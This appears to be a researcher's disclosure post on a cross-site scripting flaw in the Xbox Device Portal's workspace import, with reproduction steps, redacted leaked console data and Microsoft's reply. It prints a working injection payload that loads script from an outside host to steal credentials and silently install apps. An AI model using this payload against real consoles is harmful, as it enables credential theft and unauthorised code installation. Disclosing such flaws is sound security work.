XSS to RCE - Exploiting the Xbox Device Portal

The Xbox Device Portal is an invaluable tool for developers, offering remote access to an Xbox console in developer mode via a web browser. It allows for deploying apps, managing files, and monitoring performance. However, a vulnerability discovered within this portal highlights the potential risks even in developer-focused tools, especially when robust security measures like Content Security Policy (CSP) are absent.

This post details a Cross-Site Scripting (XSS) vulnerability found in the "Import Workspace" feature of the Xbox Device Portal, its potential impact, and the subsequent response from Microsoft.

The Vulnerability: How It Works

The core of the vulnerability lies in how the Xbox Device Portal handles custom workspace imports. Developers can create and import .workspace files, which are JSON formatted files defining the layout and tools within the portal.

The specific point of injection is the "name" key within the JSON structure of a workspace file.

Here’s an example snippet from a malicious test.workspace file, showing the payload in the name field:

{
  "layout": {
    "name": "\"><img src=x onerror=\"var a=document.createElement('script');a.src='//xss.ash-king.co.uk/xbox';document.body.appendChild(a)\" />\"",
    // ... other workspace configuration ...
  }
}

When a user imports this crafted workspace file, the Device Portal application takes the value of the "name" key and appends it to the workspace menu. Crucially, the application renders this name as HTML without proper sanitization. This oversight, combined with a lack of a Content Security Policy (CSP) to restrict what content can be loaded or executed, allows the embedded HTML and JavaScript payload to run in the context of the user's browser session with the Device Portal.

The Impact: From Data Exfiltration to Remote Code Execution

The proof-of-concept demonstrated in the video showcases a two-stage attack:

• Stage 1: Sensitive Information Exfiltration:
  Once the malicious workspace is imported and the XSS payload triggers, the injected script (payload.js hosted externally in the example) executes. This script can then make requests to the Device Portal's internal APIs.
  • Exposed Data:This allows access to sensitive information such as SMB usernames/passwords, console serial numbers, and other potentially Personally Identifiable Information (PII) accessible through these APIs. This information was observed being logged to the web browser's developer console in the proof-of-concept. Here is an example of some of the data we can access:

    {
          "OSVersion": "10.0.22621.2864 (xb_flt_2211ni.221130-1745)",
          "DevMode": "Universal Windows App Devkit",
          "OsEdition": "November 2022",
          "ConsoleType": "Lockhart",
          "ConsoleId": "████████████████████",
          "DeviceId": "███████████████",
          "SerialNumber": "████████",
          "DevkitCertificateExpirationTime": 1681409222
        },
        {
          "ComputerName": "XBOX",
          "Language": "en-US",
          "OsEdition": "SystemOS",
          "OSEditionId": 192,
          "OSVersion": "22621.2864.amd64fre.xb_flt_2211ni.221130-1745",
          "Platform": "Xbox Series S",
          "UserId": ██,
          "EmailAddress": "██████████",
          "AutoSignIn": false,
          "Gamertag": "█████████",
          "XboxUserId": "██████",
          "SignedIn": true
        }
      ],
      "Path": "D:\\DevelopmentFiles",
      "Username": "DevToolsUser",
      "Password": "████████"
    }
    

• Stage 2: Remote Code Execution (RCE):
  The Device Portal APIs don't just expose data; they also allow an authenticated user (which the XSS script effectively becomes) to upload and run packages on the Xbox console.
  • Silent App Installation: The second stage of the example payload leverages this capability to download an application bundle from an external source and install it onto the Xbox console, all without any further user interaction beyond the initial workspace import. This demonstrates a clear path to RCE on the developer console.

Steps To Reproduce

1. Launch the Xbox console into dev mode.
2. Ensure Remote Access is enabled on the console.
3. Access the Xbox Device Portal web app by navigating to the IP address displayed on the Xbox's Dev Home screen.
4. Click the menu icon (top left) and select "Import workspace."
5. Attach the malicious .workspace file (e.g., test.workspace).
6. Click "Import."
7. Upon page reload, the XSS payload executes.
   • Sensitive information would appear in the browser's developer console.
   • The Xbox console would silently install the externally hosted app bundle.

Disclosure Timeline and Microsoft's Response

• Vulnerability Reported to Microsoft: February 13th, 2023
• Microsoft's Response Received: June 20th, 2023

Microsoft's MSRC (Microsoft Security Response Center) provided the following response, marking the case as complete:

Hello Ash,

Thank you again for submitting this issue to Microsoft. Currently, MSRC prioritizes vulnerabilities that are assessed as “Important” or “Critical’ severities for immediate servicing. After careful investigation, this case has been assessed as Moderate severity and does not meet MSRC’s bar for immediate servicing since WDP being enabled with auth defaulted to off on ERA devkits, which is the only scenario where we support untrusted networks. The engineer team is looking at this report and may adopt a stricter security model in the future.

Key Takeaways from Microsoft's Response:

• The vulnerability was assessed as "Moderate" severity.
• It does not meet the bar for immediate servicing (patching).
• The rationale hinges on the context: Microsoft states the primary risk scenario is when Windows Device Portal (WDP, the underlying tech for Xbox Device Portal) is enabled with authentication defaulted to off on "ERA devkits" (likely referring to Early Release Access or specific developer kit configurations) operating on untrusted networks.
• The engineering team is aware and may consider a stricter security model in the future.

Conclusion and Developer Awareness

While Microsoft has assessed this vulnerability as "Moderate" and marked the report as complete due to the specific conditions they believe are required for significant risk (auth off on devkits on untrusted networks), the potential for data exfiltration and RCE is concerning for any developer using the Xbox Device Portal.

Developers should exercise caution when importing workspace files from untrusted or unverified sources. The lack of CSP is a significant contributing factor here, as a well-implemented CSP could have mitigated the XSS payload's ability to execute or connect to external resources.

Even if authentication is typically enabled, this vulnerability underscores the importance of input sanitization and defense-in-depth. We hope Microsoft will indeed "adopt a stricter security model" for the Device Portal in a future update to better protect developers and the sensitive data their consoles might handle.

Stay safe, and always be vigilant about the tools and files you use in your development workflows.